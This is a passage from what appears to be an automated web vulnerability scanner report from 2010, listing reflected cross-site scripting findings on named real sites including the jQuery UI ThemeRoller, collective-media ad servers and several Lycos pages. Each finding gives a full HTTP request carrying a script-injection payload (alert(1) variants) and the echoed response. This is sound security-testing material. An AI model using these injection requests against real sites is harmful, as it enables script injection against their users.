Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120061

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.112. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b29"><script>alert(1)</script>6aefc48648e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.113. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d012"><script>alert(1)</script>1062076bf26 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

3.114. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd14c"><script>alert(1)</script>f7a209fba9 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.115. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e33"><script>alert(1)</script>b5761ac56ec was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.116. http://k.collective-media.net/cmadj/cm.idg_b2c/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.idg_b2c/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b947'-alert(1)-'faa1d4c7922 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.idg_b2c5b947'-alert(1)-'faa1d4c7922/;sz=728x90;net=cm;ord=5241744;env=ifr;ord1=854900;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:27:46 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7380

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-57666374_1292164066","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c5b947'-alert(1)-'faa1d4c7922&size=728x90&referrer=http%3A%2F%2Fmail.lycos.com%2Flycos%2FIndex.lycos&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c5b947%27-alert%281%29-%27faa1d4c7922%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-57666374_1
...[SNIP]...

3.117. http://k.collective-media.net/cmadj/cm.idg_b2c/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.idg_b2c/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee53c'-alert(1)-'3c2da3549e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.idg_b2c/;sz=ee53c'-alert(1)-'3c2da3549e8 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7288
Date: Sun, 12 Dec 2010 14:34:24 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41320597_1292164464","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c&size=ee53c'-alert(1)-'3c2da3549e8&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41320597_1292164464%2C%2Cnone%2C%3B%3Bcmw%3Dnurl%3Bsz%3Dee53c%27-alert%281%29-%273c2da3549e8%3Bcontx%3Dnone
...[SNIP]...

3.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2147"><script>alert(1)</script>caa0e56bdf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1 HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1&mobile=1">
...[SNIP]...

3.119. http://peoplesearch.lycos.com/ [search-type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f361d"><script>alert(1)</script>60b9214b859 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859&mobile=1">
...[SNIP]...

3.120. http://peoplesearch.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7863b"><script>alert(1)</script>a804a600e0d was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people7863b"><script>alert(1)</script>a804a600e0d HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people7863b"><script>alert(1)</script>a804a600e0d&mobile=1">
...[SNIP]...

3.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353e6"><script>alert(1)</script>5876eddc96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?353e6"><script>alert(1)</script>5876eddc96c=1 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?353e6"><script>alert(1)</script>5876eddc96c=1&mobile=1">
...[SNIP]...

3.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://registration.lycos.com
Path:   /forgot.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f715"><script>alert(1)</script>0a78a0c622c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgot.php/4f715"><script>alert(1)</script>0a78a0c622c HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:51 GMT
Server:
Set-Cookie: PENTA=174.121.222.18.1292164491267196; path=/; domain=.lycos.com
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sat, 12-Dec-2009 14:34:50 GMT
Set-Cookie: isMobile=mobile; expires=Sun, 12-Dec-2010 15:34:51 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5935
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="http://hb
...[SNIP]...
<form action="/forgot.php/4f715"><script>alert(1)</script>0a78a0c622c" method="post">
...[SNIP]...

3.123. http://search.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a61f"><script>alert(1)</script>cb2791bb9c4 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images6a61f"><script>alert(1)</script>cb2791bb9c4 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images6a61f"><script>alert(1)</script>cb2791bb9c4&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

